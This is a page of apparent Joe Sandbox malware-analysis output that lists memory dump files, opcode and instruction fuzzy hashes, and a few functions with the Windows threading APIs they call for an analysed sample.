Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22c94d92b6eb7cc4382379bfffc9f9e8aff259596e39ded2a86e9db2b6bcbda5
Instruction ID: c7ca74ddabf7855bae8d812d084359cde8d1eca86dd90bdb6a568ba67a3d0da0
Opcode Fuzzy Hash: 22c94d92b6eb7cc4382379bfffc9f9e8aff259596e39ded2a86e9db2b6bcbda5
Instruction Fuzzy Hash: F521B673F204394B770CC47E8C5327DB6E1C78C551745423AE8A6EA2C1D968D917E2E4

Function 0090779B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b88e498ce2622b10e34f08c7b74b81c2b709fd28349b5d339215fa4457fc985d
Instruction ID: 8db623d1d89397af56a7681cc12486392f6250474a6304b015ad16c6079eeefe
Opcode Fuzzy Hash: b88e498ce2622b10e34f08c7b74b81c2b709fd28349b5d339215fa4457fc985d
Instruction Fuzzy Hash: 75118A23F30C255B675C81AD8C1727A95D2DBD825071F533AD826E72C4E9A4EE13D290

Function 00908860 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 1fa8e921030768bb7cb00eab2e0367b55852c41e5dfbcfd1c6da387110ef696b
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 3A112B773001824FE604862DC8B85B7A79EEBC53317ACC37AD8E14B7D8DA22E9459A00

Function 008FA302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: c5489778cdf0569d0acffb0530428b8819177aff6fae2f9a4e1678fb993c93e1
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 89E0867291112CEBC714DBACC504999F3ECFB45B10F550056F605D3250C270DE00C7D1

Function 008C2EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 008C2F5F
GetCurrentThreadId.KERNEL32 ref: 008C2F7E
__Mtx_unlock.LIBCPMT ref: 008C2FCC
__Cnd_broadcast.LIBCPMT ref: 008C2FE3
__Mtx_unlock.LIBCPMT ref: 008C30F5
GetCurrentThreadId.KERNEL32 ref: 008C3132
__Mtx_unlock.LIBCPMT ref: 008C319B

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: e41e199e0be3c04a2cd1456cda1699463fb82d3b4ecc3d06643754e524fc2f8b
